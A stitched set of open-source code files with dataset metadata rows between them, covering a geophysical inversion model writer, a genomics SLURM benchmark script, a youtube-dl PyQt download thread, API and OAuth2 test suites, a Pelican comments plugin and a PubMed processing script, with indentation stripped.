outfile.seek(n-linelength*m)
line = outfile.readline().strip().split()
m += 1
self.outfile_reslines = np.zeros([mb,4])
for m in range(mb):
self.outfile_reslines[m] = [float(ll) for ll in line]
line = outfile.readline().strip().split()
# iterate through resistivity and assign new values if they have been inverted for
n = 0
nair = self.n_airlayers + 1
nx,nz = len(self.meshlocations_x), len(self.meshlocations_z)
for i in range(nz - nair):
for j in range(nx - 1):
for k in range(6):
mfi = (nx - 1)*i + j + 1
if self.modelfile_reslines[mfi,k+8] == '1':
if k < 3:
self.resistivity[i+nair-1,j,k] = self.outfile_reslines[n,2]
else:
self.sds[i+nair-1,j,k-3] = self.outfile_reslines[n,2]
n += 1
# print i,j,k,n
def build_model(self):
"""
build model file string
"""
# build a forward model object
ro = p2d.Model(self.working_directory,**self.input_parameters)
ro.build_model()
        # assign relevant parameters to pek 2d inverse object
for at in ['stationlocations','parameters_model',
'meshlocations_x','meshlocations_z',
'meshblockwidths_x','meshblockthicknesses_z',
'profile_easts','profile_norths','Data',
'meshblockthicknesses_zair','meshlocations_zair']:
attvalue = getattr(ro,at)
setattr(self,at,attvalue)
ro.get_station_meshblock_numbers()
if ro.build_from_1d:
# try:
ro.get_1d_results()
ro.interpolate_1d_results()
for at in ['inversion1d_dirdict','inversion1d_modelno',
'models1d','resistivity','stationlocations',
'blockcentres_x','blockcentres_z']:
attvalue = getattr(ro,at)
setattr(self,at,attvalue)
# except:
else:
for at in ['resistivity','stationlocations',
'blockcentres_x','blockcentres_z']:
setattr(self,at,getattr(ro,at))
for at in ['inversion1d_dirdict','inversion1d_modelno',
'models1d']:
setattr(self,at,None)
ro.get_station_meshblock_numbers()
self.stationblocknums=ro.stationblocknums
self.build_modelfilestring()
def write_modelfile(self):
if not hasattr(self,'modelfilestring'):
self.build_model()
outfile = open(op.join(self.working_directory,
self.modelfile),'w')
outfile.write(self.modelfilestring)
outfile.close()
def build_modelfilestring(self):
# initialise a list containing info for model file
modelfilestring = []
# add header info
modelfilestring.append('NEW')
modelfilestring.append(' 1')
modelfilestring.append(' 1.000')
# add string giving number of cells:
modelfilestring.append(''.join(['%5i'%i for i in [len(self.meshlocations_x),
len(self.meshlocations_z)+self.n_airlayers,
self.n_airlayers+1]]))
# add strings giving horizontal and vertical mesh steps
meshz = list(self.meshblockthicknesses_zair)+list(self.meshblockthicknesses_z)
for meshstep in [self.meshblockwidths_x,meshz]:
modelfilestring.append\
(p2d.create_multiple_line_string(meshstep,
10,'%10.3f'))
# add resistivity map
rmap = ('%5i'%0*len(self.resistivity[0])+'\n')*self.n_airlayers
rmap += '\n'.join([''.join('%5i'%ii for ii in i) for i in \
np.arange(1,np.size(self.resistivity[:,:,0])+1).reshape(np.shape(self.resistivity)[:2])])
modelfilestring.append(rmap)
# add number of resistivity domains (+1 to include air)
modelfilestring.append('%5i'%(np.size(self.resistivity[:,:,0])+1))
# add dictionary contents, assuming rvertical = rmax, slant and dip zero
# first, air layer, properties always the same
modelfilestring.append(' 0 0 -1.00 0.00 0.00 0.00 0.00 0.00 0 0 0 0 0 0')
# second, dictionary contents
no = 1
for j in range(len(self.resistivity)):
for i in range(len(self.resistivity[j])):
# initialise a list containing resx,resy,strike
rlist = list(self.resistivity[j,i])
# insert resz (assumed to be same as resy)
rlist.insert(2,rlist[1])
# insert dip and slant (assumed zero)
rlist += [0.,0.]
# if rlist[1]/rlist[0] == 1.:
# aniso = ' 0'
# invert_key = ' 1 1 1 0 0 0'
# else:
aniso = ' 1'
invert_key = ' 1 1 1 1 1 0'
modelfilestring.append(''.join(['%5i'%no,aniso]+['%10.2f'%i for i in rlist]+[invert_key]))
no += 1
# append bathymetry index, at this stage only 0 allowed:
modelfilestring.append('%5i'%0)
# append number of calculation points (stations):
modelfilestring.append('%5i'%len(self.stationblocknums))
# append rotation
modelfilestring.append('%10.2f'%self.rotation)
# append station blocknums
modelfilestring.append(p2d.create_multiple_line_string(self.stationblocknums,
5,' %03i'))
modelfilestring.append('%5i'%0)
self.modelfilestring = '\n'.join(modelfilestring)+'\n'
def build_data(self):
imethod = 'nearest'
ftol = 0.000001
num_freq = int(self.parameters_data['max_no_frequencies'])
# get minimum and maximum periods
min_val = max([min(1./zo.freq) for zo in self.Data.Z])
max_val = min([max(1./zo.freq) for zo in self.Data.Z])
periodlst = []
for period in 1./self.Data.frequencies:
if len(periodlst) > 0:
# find the difference between the period and the closest period already in the list
closest_period_diff = np.amin(np.abs(np.array(periodlst)-period))
else:
# otherwise set period difference to a large number
closest_period_diff = 99999
# check whether the fractional difference is bigger than the tolerance set
# print closest_period_diff,closest_period_diff/period,
if closest_period_diff/period > ftol:
if min_val <= period <= max_val:
periodlst.append(period)
periodlst.sort()
# print periodlst
# if number of periods still too long based on the number of frequencies set
# then take out some frequencies
n = 2
new_periodlst = periodlst
while len(new_periodlst) > num_freq:
new_periodlst = [periodlst[int(p)] for p in range(len(periodlst)) if p%n == 0]
n += 1
periodlst = new_periodlst
mode = self.parameters_data['mode']
if type(mode) in [str]:
mode = mode.split(',')
self.parameters_data['mode'] = mode
datafile_data = {}
for ee,zo in enumerate(self.Data.Z):
to=self.Data.Tipper[ee]
datfn = str(self.stationblocknums[ee])+'_'+self.Data.stations[ee]+'.dat'
zerr = zo.zerr
z = zo.z
ze_rel = zerr/np.abs(z)
terr = to.tippererr
t = to.tipper
te_rel = terr/np.abs(t)
# set error floors
efz = self.parameters_data['errorfloor']['z']
eft = self.parameters_data['errorfloor']['tipper']
eftype = self.parameters_data['errorfloor_type']
if eftype in ['relative','offdiagonals']:
for i in range(2):
for j in range(2):
ze_rel[ze_rel<efz[i,j]] = efz[i,j]
te_rel[te_rel<eft[i]] = eft[i]
zerr = ze_rel * np.abs(z)
terr = te_rel * np.abs(t)
if eftype == 'offdiagonals':
for i in range(2):
for iz in range(len(z)):
if zerr[iz,i,i] < zerr[iz,i,1-i]:
zerr[iz,i,i] = zerr[iz,i,1-i]
zvar = zerr**2
# create interpolation functions to interpolate z and tipper values
properties = dict(z_real=np.real(z),z_imag=np.imag(z),
z_var=zvar,tipper_real=np.real(t),
tipper_imag=np.imag(t),tipper_err=terr)
properties_interp = {}
for key in properties.keys():
f = si.interp1d(np.log10(1./zo.freq),properties[key],
axis = 0,kind = imethod)
properties_interp[key] = f(np.log10(periodlst))
datafile_data[datfn] = properties_interp
self.datafile_data = datafile_data
self.freq = 1./(np.array(periodlst))
def build_datafiles(self):
if not hasattr(self,'datafile_data'):
self.build_data()
dfstrings = {}
for dfile in self.datafile_data.keys():
datfstr = '{:<3} '.format(len(self.freq))+\
' '.join([str(i) for i in self.parameters_data['mode']])+'\n'
for pv in range(len(self.freq)):
datlst = '{0:>12}'.format('%.06f'%(1./(self.freq[pv])))
for ii in range(2):
for jj in range(2):
for pval in ['z_real', 'z_imag', 'z_var']:
# print self.datafile_data[dfile][pval][pv][ii,jj]
datlst += '{0:>12}'.format('%.06f'%self.datafile_data[dfile][pval][pv][ii,jj])
for ii in range(2):
for pval in ['tipper_real', 'tipper_imag', 'tipper_err']:
datlst += '{0:>12}'.format('%.06f'%self.datafile_data[dfile][pval][pv][0,ii])
datfstr += ''.join(datlst)+'\n'
dfstrings[dfile] = datfstr
self.datafile_strings = dfstrings
def write_datafiles(self):
if not hasattr(self,'datafile_strings'):
self.build_datafiles()
exlf = open(os.path.join(self.working_directory,self.working_directory,self.exlfile),'w')
dfkeys=self.datafile_strings.keys()
dfkeys.sort()
for dfile in dfkeys:
f = open(op.join(self.working_directory,self.working_directory,dfile),'w')
f.write(self.datafile_strings[dfile])
f.close()
exlf.write(dfile+'\n')
exlf.close()
def write_ctlfile(self):
ctrf = open(op.join(self.working_directory,self.working_directory,'pb.ctr'),'w')
if type(self.parameters_data['mode']) == str:
self.parameters_data['mode'] = self.parameters_data['mode'].split(',')
ef = np.hstack([self.parameters_data['errorfloor'][l].flatten() for l in ['z','tipper']])
clist = []
clist.append(self.exlfile)
clist.append(self.parameters_ctl['ctl_string']+self.parameters_ctl['units_string']+self.parameters_ctl['quadrants'])
clist.append(' '.join([str(i) for i in self.parameters_data['mode']]))
clist.append(' '.join(['0.00' for i in ef]))
clist.append(self.parameters_ctl['orientation_string'])
clist.append(self.modelfile)
clist.append(self.resfile)
clist.append(self.parameters_ctl['convergence_string'])
clist.append(self.parameters_ctl['roughness_string'])
clist.append(self.parameters_ctl['anisotropy_penalty_string'])
clist.append(self.parameters_ctl['anisotropy_ctl_string'])
clist.append(self.cvgfile)
clist.append(self.outfile)
clist.append(self.pexfile)
clist.append(self.andfile)
self.controlfile_string = '\n'.join(clist)
ctrf.write(self.controlfile_string)
ctrf.close() | gpl-3.0 | 4,673,820,515,280,582,000 | 38.548638 | 125 | 0.513258 | false |
calico/basenji | bin/basenji_bench_gtex.py | 1 | 7886 | #!/usr/bin/env python
# Copyright 2020 Calico LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from optparse import OptionParser
import glob
import os
import pickle
import shutil
import subprocess
import sys
import h5py
import numpy as np
import slurm
"""
basenji_bench_gtex.py
Compute SNP expression difference scores for variants in VCF files of
fine-mapped GTEx variants to benchmark as features in a classification
task.
"""
################################################################################
# main
################################################################################
def main():
usage = 'usage: %prog [options] <params_file> <model_file>'
parser = OptionParser(usage)
# sad
parser.add_option('-f', dest='genome_fasta',
default='%s/data/hg38.fa' % os.environ['BASENJIDIR'],
help='Genome FASTA for sequences [Default: %default]')
parser.add_option('--local',dest='local',
default=1024, type='int',
help='Local SAD score [Default: %default]')
parser.add_option('-n', dest='norm_file',
default=None,
help='Normalize SAD scores')
parser.add_option('-o',dest='out_dir',
default='sad_gtex',
help='Output directory for tables and plots [Default: %default]')
parser.add_option('--pseudo', dest='log_pseudo',
default=1, type='float',
help='Log2 pseudocount [Default: %default]')
parser.add_option('--rc', dest='rc',
default=False, action='store_true',
help='Average forward and reverse complement predictions [Default: %default]')
parser.add_option('--shifts', dest='shifts',
default='0', type='str',
help='Ensemble prediction shifts [Default: %default]')
parser.add_option('--stats', dest='sad_stats',
default='SAD',
help='Comma-separated list of stats to save. [Default: %default]')
parser.add_option('-t', dest='targets_file',
default=None, type='str',
help='File specifying target indexes and labels in table format')
parser.add_option('--ti', dest='track_indexes',
default=None, type='str',
help='Comma-separated list of target indexes to output BigWig tracks')
parser.add_option('--threads', dest='threads',
default=False, action='store_true',
help='Run CPU math and output in a separate thread [Default: %default]')
parser.add_option('-u', dest='penultimate',
default=False, action='store_true',
help='Compute SED in the penultimate layer [Default: %default]')
# classify
parser.add_option('--msl', dest='msl',
default=1, type='int',
help='Random forest min_samples_leaf [Default: %default]')
# multi
parser.add_option('-e', dest='conda_env',
default='tf2.4',
help='Anaconda environment [Default: %default]')
parser.add_option('-g', dest='gtex_vcf_dir',
default='/home/drk/seqnn/data/gtex_fine/susie_pip90')
parser.add_option('--name', dest='name',
default='gtex', help='SLURM name prefix [Default: %default]')
parser.add_option('--max_proc', dest='max_proc',
default=None, type='int',
help='Maximum concurrent processes [Default: %default]')
parser.add_option('-p', dest='processes',
default=None, type='int',
help='Number of processes, passed by multi script. \
(Unused, but needs to appear as dummy.)')
parser.add_option('-q', dest='queue',
default='gtx1080ti',
help='SLURM queue on which to run the jobs [Default: %default]')
parser.add_option('-r', dest='restart',
default=False, action='store_true',
help='Restart a partially completed job [Default: %default]')
(options, args) = parser.parse_args()
if len(args) != 2:
parser.error('Must provide parameters and model files')
else:
params_file = args[0]
model_file = args[1]
#######################################################
# prep work
# output directory
if not options.restart:
if os.path.isdir(options.out_dir):
print('Please remove %s' % options.out_dir, file=sys.stderr)
exit(1)
os.mkdir(options.out_dir)
# pickle options
options_pkl_file = '%s/options.pkl' % options.out_dir
options_pkl = open(options_pkl_file, 'wb')
pickle.dump(options, options_pkl)
options_pkl.close()
#######################################################
# predict
cmd_base = '. /home/drk/anaconda3/etc/profile.d/conda.sh;'
cmd_base += ' conda activate %s;' % options.conda_env
cmd_base += ' basenji_sad.py %s %s %s' % (options_pkl_file, params_file, model_file)
jobs = []
for gtex_pos_vcf in glob.glob('%s/*_pos.vcf' % options.gtex_vcf_dir):
# positive job
job_base = os.path.splitext(os.path.split(gtex_pos_vcf)[1])[0]
out_dir = '%s/%s' % (options.out_dir, job_base)
if not options.restart or not os.path.isfile('%s/sad.h5'%out_dir):
cmd = '%s -o %s %s' % (cmd_base, out_dir, gtex_pos_vcf)
name = '%s_%s' % (options.name, job_base)
j = slurm.Job(cmd, name,
'%s.out'%out_dir, '%s.err'%out_dir,
queue=options.queue, gpu=1,
mem=22000, time='1-0:0:0')
jobs.append(j)
# negative job
gtex_neg_vcf = gtex_pos_vcf.replace('_pos.','_neg.')
job_base = os.path.splitext(os.path.split(gtex_neg_vcf)[1])[0]
out_dir = '%s/%s' % (options.out_dir, job_base)
if not options.restart or not os.path.isfile('%s/sad.h5'%out_dir):
cmd = '%s -o %s %s' % (cmd_base, out_dir, gtex_neg_vcf)
name = '%s_%s' % (options.name, job_base)
j = slurm.Job(cmd, name,
'%s.out'%out_dir, '%s.err'%out_dir,
queue=options.queue, gpu=1,
mem=22000, time='1-0:0:0')
jobs.append(j)
slurm.multi_run(jobs, max_proc=options.max_proc, verbose=True,
launch_sleep=10, update_sleep=60)
#######################################################
# classify
cmd_base = 'basenji_bench_classify.py -i 100 -p 2 -r 44 -s'
cmd_base += ' --msl %d' % options.msl
jobs = []
for gtex_pos_vcf in glob.glob('%s/*_pos.vcf' % options.gtex_vcf_dir):
tissue = os.path.splitext(os.path.split(gtex_pos_vcf)[1])[0][:-4]
sad_pos = '%s/%s_pos/sad.h5' % (options.out_dir, tissue)
sad_neg = '%s/%s_neg/sad.h5' % (options.out_dir, tissue)
out_dir = '%s/%s_class' % (options.out_dir, tissue)
if not options.restart or not os.path.isfile('%s/stats.txt' % out_dir):
cmd = '%s -o %s %s %s' % (cmd_base, out_dir, sad_pos, sad_neg)
j = slurm.Job(cmd, tissue,
'%s.out'%out_dir, '%s.err'%out_dir,
queue='standard', cpu=2,
mem=22000, time='1-0:0:0')
jobs.append(j)
slurm.multi_run(jobs, verbose=True)
def job_completed(options, pi):
"""Check whether a specific job has generated its
output file."""
if options.out_txt:
out_file = '%s/job%d/sad_table.txt' % (options.out_dir, pi)
elif options.out_zarr:
out_file = '%s/job%d/sad.zarr' % (options.out_dir, pi)
elif options.csv:
out_file = '%s/job%d/sad_table.csv' % (options.out_dir, pi)
else:
out_file = '%s/job%d/sad.h5' % (options.out_dir, pi)
return os.path.isfile(out_file) or os.path.isdir(out_file)
################################################################################
# __main__
################################################################################
if __name__ == '__main__':
main()
| apache-2.0 | -2,270,618,590,698,872,600 | 36.023474 | 86 | 0.591301 | false |
yasoob/youtube-dl-GUI | Threads/Download.py | 1 | 6410 | import math
from pathlib import Path
import youtube_dl
from PyQt5 import QtCore
class StopError(Exception):
pass
class DownloadSignals(QtCore.QObject):
"Define the signals available from a running download thread"
status_bar_signal = QtCore.pyqtSignal(str)
remove_url_signal = QtCore.pyqtSignal(str)
add_update_list_signal = QtCore.pyqtSignal([list])
remove_row_signal = QtCore.pyqtSignal()
finished = QtCore.pyqtSignal()
class Download(QtCore.QRunnable):
"Download Thread"
def __init__(self, opts):
super(Download, self).__init__()
self.parent = opts.get("parent")
self.error_occurred = False
self.done = False
self.file_name = ""
self.speed = "-- KiB/s"
self.eta = "00:00"
self.bytes = self.format_bytes(None)
self.url = opts.get("url")
self.directory = opts.get("directory")
if self.directory:
self.directory = str(Path(opts.get("directory")).resolve())
self.local_rowcount = opts.get("rowcount")
self.convert_format = opts.get("convert_format")
self.proxy = opts.get("proxy")
self.keep_file = opts.get("keep_file")
# Signals
self.signals = DownloadSignals()
def hook(self, li):
if self.done:
raise StopError()
_file_name = li.get("filename")
if li.get("downloaded_bytes"):
if li.get("speed"):
self.speed = self.format_speed(li.get("speed"))
self.eta = self.format_seconds(li.get("eta"))
self.bytes = self.format_bytes(li.get("total_bytes", "unknown"))
filename = str(Path(_file_name).stem)
self.signals.add_update_list_signal.emit(
[
self.local_rowcount,
filename,
self.bytes,
self.eta,
self.speed,
li.get("status"),
]
)
elif li.get("status") == "finished":
self.file_name = str(Path(_file_name).stem)
self.signals.add_update_list_signal.emit(
[
self.local_rowcount,
self.file_name,
self.bytes,
self.eta,
self.speed,
"Converting",
]
)
else:
self.bytes = self.format_bytes(li.get("total_bytes"))
self.file_name = Path(_file_name).name
self.speed = "-- KiB/s"
self.signals.add_update_list_signal.emit(
[
self.local_rowcount,
self.file_name,
self.bytes,
"00:00",
self.speed,
"Finished",
]
)
self.signals.status_bar_signal.emit("Already Downloaded")
self.signals.remove_row_signal.emit()
def _prepare_ytd_options(self):
ydl_options = {
"outtmpl": f"{self.directory}/%(title)s-%(id)s.%(ext)s",
"continuedl": True,
"quiet": True,
"proxy": self.proxy,
}
if self.convert_format is not False:
ydl_options["postprocessors"] = [
{
"key": "FFmpegVideoConvertor",
"preferedformat": self.convert_format,
}
]
if self.keep_file:
ydl_options["keepvideo"] = True
return ydl_options
def download(self):
ydl_options = self._prepare_ytd_options()
with youtube_dl.YoutubeDL(ydl_options) as ydl:
ydl.add_default_info_extractors()
ydl.add_progress_hook(self.hook)
try:
ydl.download([self.url])
except (
youtube_dl.utils.DownloadError,
youtube_dl.utils.ContentTooShortError,
youtube_dl.utils.ExtractorError,
youtube_dl.utils.UnavailableVideoError,
) as e:
self.error_occurred = True
self.signals.remove_row_signal.emit()
self.signals.remove_url_signal.emit(self.url)
self.signals.status_bar_signal.emit(str(e))
except StopError:
# import threading
# print("Exiting thread:", threading.currentThread().getName())
self.done = True
self.signals.finished.emit()
@QtCore.pyqtSlot()
def run(self):
self.signals.add_update_list_signal.emit(
[self.local_rowcount, self.url, "", "", "", "Starting"]
)
self.download()
if self.error_occurred is not True:
self.signals.add_update_list_signal.emit(
[
self.local_rowcount,
self.file_name,
self.bytes,
"00:00",
self.speed,
"Finished",
]
)
self.signals.status_bar_signal.emit("Done!")
self.signals.remove_url_signal.emit(self.url)
self.done = True
self.signals.finished.emit()
def stop(self):
self.done = True
def format_seconds(self, seconds):
(minutes, secs) = divmod(seconds, 60)
(hours, minutes) = divmod(minutes, 60)
if hours > 99:
return "--:--:--"
if hours == 0:
return "%02d:%02d" % (minutes, secs)
else:
return "%02d:%02d:%02d" % (hours, minutes, secs)
# TODO: Move to utils
def format_bytes(self, _bytes=None):
if not _bytes:
return "N/A"
        try:
            _bytes = float(_bytes)
        except (TypeError, ValueError):
            # the progress hook may pass "unknown" when total_bytes is missing
            return "N/A"
if _bytes == 0.0:
exponent = 0
else:
exponent = int(math.log(_bytes, 1024.0))
suffix = ["B", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB"][exponent]
converted = _bytes / float(1024 ** exponent)
return "%.2f%s" % (converted, suffix)
def format_speed(self, speed=None):
if not speed:
return "%10s" % "---b/s"
return "%10s" % ("%s/s" % self.format_bytes(speed))
| mit | 7,824,562,817,449,066,000 | 31.538071 | 88 | 0.487676 | false |
trickvi/pepperhash | scripts/hash_message.py | 1 | 1105 | # hash_message - submit a message to pepperhash for hash generation
# Copyright (C) 2015 Tryggvi Bjorgvinsson
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import getpass
import urlparse
import urllib
# Grab the stuff we need like host and message we'll be sending
host = raw_input("Cryptkeeper host: ")
msg = getpass.getpass("Message: ")
# Post the message to the service and print the response
response = urllib.urlopen(
host, urllib.urlencode({'message':msg}))
print response.read()
| agpl-3.0 | -2,033,055,807,987,605,200 | 37.103448 | 77 | 0.761991 | false |
AASHE/python-membersuite-api-client | membersuite_api_client/tests/test_security.py | 1 | 5431 | import os
import unittest
from ..exceptions import LoginToPortalError, MemberSuiteAPIError
from ..security import models
from ..security.services import login_to_portal, logout
from ..utils import get_new_client
LOGIN_TO_PORTAL_RETRIES = 5
LOGIN_TO_PORTAL_DELAY = 1
MEMBER_ID = os.environ['TEST_MS_MEMBER_PORTAL_USER_ID']
MEMBER_PASSWORD = os.environ['TEST_MS_MEMBER_PORTAL_USER_PASSWORD']
NONMEMBER_ID = os.environ['TEST_MS_NON_MEMBER_PORTAL_USER_ID']
NONMEMBER_PASSWORD = os.environ['TEST_MS_NON_MEMBER_PORTAL_USER_PASSWORD']
MEMBER_ORG_NAME = os.environ['TEST_MS_MEMBER_ORG_NAME']
def _login(client, member=True):
if client.session_id is None:
client.request_session()
if member:
return login_to_portal(
username=MEMBER_ID,
password=MEMBER_PASSWORD,
client=client,
retries=LOGIN_TO_PORTAL_RETRIES,
delay=LOGIN_TO_PORTAL_DELAY)
else:
return login_to_portal(
username=NONMEMBER_ID,
password=NONMEMBER_PASSWORD,
client=client,
retries=LOGIN_TO_PORTAL_RETRIES,
delay=LOGIN_TO_PORTAL_DELAY)
class SecurityServicesTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.client = get_new_client()
def test_login_to_portal(self):
"""Can we log in to the portal?"""
portal_user = _login(client=self.client)
self.assertIsInstance(portal_user, models.PortalUser)
def test_login_to_portal_failure(self):
"""What happens when we can't log in to the portal?"""
with self.assertRaises(LoginToPortalError):
login_to_portal(username="bo-o-o-gus user ID",
password="wrong password",
client=self.client,
retries=LOGIN_TO_PORTAL_RETRIES,
delay=LOGIN_TO_PORTAL_DELAY)
def test_logout(self):
"""Can we logout?
This logs out from the API client session, not the MemberSuite
Portal.
"""
self.client.session_id = None
self.client.request_session() # A fresh session. Yum!
self.assertTrue(self.client.session_id)
logout(self.client)
self.assertIsNone(self.client.session_id)
class PortalUserTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.client = get_new_client()
def setUp(self):
self.portal_user = _login(client=self.client)
def test_generate_username(self):
"""Does generate_username() work?
"""
self.portal_user.membersuite_id = "6faf90e4-fake-membersuite-id"
self.assertEqual("ms-fake-membersuite-id",
                         models.generate_username(self.portal_user))
def test_get_individual(self):
"""Does get_individual() work?
"""
individual = self.portal_user.get_individual(client=self.client)
self.assertEqual(self.portal_user.first_name, individual.first_name)
self.assertEqual(self.portal_user.last_name, individual.last_name)
self.assertEqual(self.portal_user.owner, individual.membersuite_id)
class IndividualTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.client = get_new_client()
def setUp(self):
self.client.request_session()
member_portal_user = _login(client=self.client)
self.individual_member = member_portal_user.get_individual(
client=self.client)
def test_is_member_for_member(self):
"""Does is_member() work for members?
"""
is_member = self.individual_member.is_member(client=self.client)
self.assertTrue(is_member)
# test_is_member_for_nonmember() below can't succeed, because it
# doesn't know about any non-member to use. Once non-member data
# (at least a non-member Organization and a connected Individudal
# with Portal Access) is available, push it into the env in
# TEST_NON_MEMBER_MS_PORTAL_USER_ID and
# TEST_NON_MEMBER_MS_PORTAL_USER_PASS and unskip this test.
@unittest.skip("Because it can't succeed")
def test_is_member_for_nonmember(self):
"""Does is_member() work for non-members?
"""
client = get_new_client()
client.request_session()
non_member_portal_user = _login(client=client,
member=False)
individual_non_member = non_member_portal_user.get_individual(
client=client)
is_member = individual_non_member.is_member(client=client)
self.assertFalse(is_member)
def test_get_primary_organization(self):
"""Does get_primary_organization() work?
Assumptions:
- self.individual_member has as its primary organization, one
named MEMBER_ORG_NAME
"""
organization = self.individual_member.get_primary_organization(
client=self.client)
self.assertEqual(MEMBER_ORG_NAME, organization.name)
def test_get_primary_organization_fails(self):
"""What happens when get_primary_organization() fails?
"""
with self.assertRaises(MemberSuiteAPIError):
self.individual_member.primary_organization__rtg = "bogus ID"
self.individual_member.get_primary_organization(
client=self.client)
if __name__ == '__main__':
unittest.main()
| mit | -2,669,964,762,304,449,500 | 31.327381 | 76 | 0.63561 | false |
AcrDijon/henet | pelican/plugins/henet_comments.py | 1 | 1027 | # -*- coding: utf-8 -*-
import traceback
from pelican import signals
from henet.comments import ArticleThread
from henet.rst.rst2html import rst2html
# xxx read config
storage_dir = '/Users/tarek/Dev/github.com/acr-dijon.org/comments/'
# xxx cache
def add_comments(generator, content):
try:
# the article unique id is its relative source path,
        # so the comments are not dependent on the URL.
source_path = content.get_relative_source_path()
article_uuid = source_path.encode('utf8')
thread = ArticleThread(storage_dir, article_uuid)
thread = thread.asjson()
for comment in thread['comments']:
html = rst2html(comment['text'], theme='acr', body_only=True)
comment['html'] = html
content.metadata["comments"] = thread
except:
        # XXX for some reason Pelican does not print plugin exceptions
traceback.print_exc()
raise
def register():
signals.article_generator_write_article.connect(add_comments)
| apache-2.0 | 475,495,567,925,430,500 | 28.342857 | 73 | 0.666991 | false |
stianpr/flask-oauthlib | tests/test_oauth2/test_code.py | 1 | 4530 | # coding: utf-8
from datetime import datetime, timedelta
from .base import TestCase
from .base import create_server, sqlalchemy_provider, cache_provider
from .base import db, Client, User, Grant
class TestDefaultProvider(TestCase):
def create_server(self):
create_server(self.app)
def prepare_data(self):
self.create_server()
oauth_client = Client(
name='ios', client_id='code-client', client_secret='code-secret',
_redirect_uris='http://localhost/authorized',
)
db.session.add(User(username='foo'))
db.session.add(oauth_client)
db.session.commit()
self.oauth_client = oauth_client
self.authorize_url = (
'/oauth/authorize?response_type=code&client_id=%s'
) % oauth_client.client_id
def test_get_authorize(self):
rv = self.client.get('/oauth/authorize')
assert 'client_id' in rv.location
rv = self.client.get('/oauth/authorize?client_id=no')
assert 'client_id' in rv.location
url = '/oauth/authorize?client_id=%s' % self.oauth_client.client_id
rv = self.client.get(url)
assert 'error' in rv.location
rv = self.client.get(self.authorize_url)
assert b'confirm' in rv.data
def test_post_authorize(self):
url = self.authorize_url + '&scope=foo'
rv = self.client.post(url, data={'confirm': 'yes'})
assert 'invalid_scope' in rv.location
url = self.authorize_url + '&scope=email'
rv = self.client.post(url, data={'confirm': 'yes'})
assert 'code' in rv.location
url = self.authorize_url + '&scope='
rv = self.client.post(url, data={'confirm': 'yes'})
assert 'error=Scopes+must+be+set' in rv.location
def test_invalid_token(self):
rv = self.client.get('/oauth/token')
assert b'unsupported_grant_type' in rv.data
rv = self.client.get('/oauth/token?grant_type=authorization_code')
assert b'error' in rv.data
assert b'code' in rv.data
url = (
'/oauth/token?grant_type=authorization_code'
'&code=nothing&client_id=%s'
) % self.oauth_client.client_id
rv = self.client.get(url)
assert b'invalid_client' in rv.data
url += '&client_secret=' + self.oauth_client.client_secret
rv = self.client.get(url)
assert b'invalid_client' not in rv.data
assert rv.status_code == 401
def test_invalid_redirect_uri(self):
authorize_url = (
'/oauth/authorize?response_type=code&client_id=code-client'
'&redirect_uri=http://localhost:8000/authorized'
'&scope=invalid'
)
rv = self.client.get(authorize_url)
assert 'error=' in rv.location
assert 'Mismatching+redirect+URI' in rv.location
def test_get_token(self):
expires = datetime.utcnow() + timedelta(seconds=100)
grant = Grant(
user_id=1,
client_id=self.oauth_client.client_id,
scope='email',
redirect_uri='http://localhost/authorized',
code='test-get-token',
expires=expires,
)
db.session.add(grant)
db.session.commit()
url = (
'/oauth/token?grant_type=authorization_code'
'&code=test-get-token&client_id=%s'
) % self.oauth_client.client_id
rv = self.client.get(url)
assert b'invalid_client' in rv.data
url += '&client_secret=' + self.oauth_client.client_secret
rv = self.client.get(url)
assert b'access_token' in rv.data
class TestSQLAlchemyProvider(TestDefaultProvider):
def create_server(self):
create_server(self.app, sqlalchemy_provider(self.app))
class TestCacheProvider(TestDefaultProvider):
def create_server(self):
create_server(self.app, cache_provider(self.app))
def test_get_token(self):
url = self.authorize_url + '&scope=email'
rv = self.client.post(url, data={'confirm': 'yes'})
assert 'code' in rv.location
code = rv.location.split('code=')[1]
url = (
'/oauth/token?grant_type=authorization_code'
'&code=%s&client_id=%s'
) % (code, self.oauth_client.client_id)
rv = self.client.get(url)
assert b'invalid_client' in rv.data
url += '&client_secret=' + self.oauth_client.client_secret
rv = self.client.get(url)
assert b'access_token' in rv.data
| bsd-3-clause | 1,346,164,920,111,912,200 | 32.308824 | 77 | 0.601104 | false |
TariqAHassan/ZeitSci | analysis/pubmed_postprocessing.py | 1 | 15935 | """
Clean the Pubmed Post Processing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Dump obtained on: July 11, 2016 (double check).
Python 3.5
"""
import re
import os
import blaze
import numpy as np
import pandas as pd
from blaze import *
from copy import deepcopy
from collections import defaultdict
from collections import OrderedDict
from easymoney.easy_pandas import strlist_to_list
from easymoney.easy_pandas import twoD_nested_dict
from analysis.abstract_analysis import common_words
from tqdm import tqdm
# from odo import odo
# Goal:
# A dataframe with the following columns:
# Researcher
# Fields -- use journal ranking dataframe
# ResearcherSubfields -- use journal ranking dataframe
# ResearchAreas (sub-subfield) -- use journal ranking dataframe -- keywords
# Amount
# NormalizedAmount -- the grant in 2015 USD (2016 not handled properly...fix)
# Currency
# YearOfGrant
# FundingSource
# Collaborators X -- based on pubmed 2000-2016 download
# keywords
# Institution
# Endowment -- use wikipedia universities database
# InstitutionType -- use wikipedia universities database (i.e., public or private)
# InstitutionRanking V -- Ranking of the institution (uni). Impact Factor usage rights are prohibitive.
# InstitutionCountry
# City/NearestCity
# lng
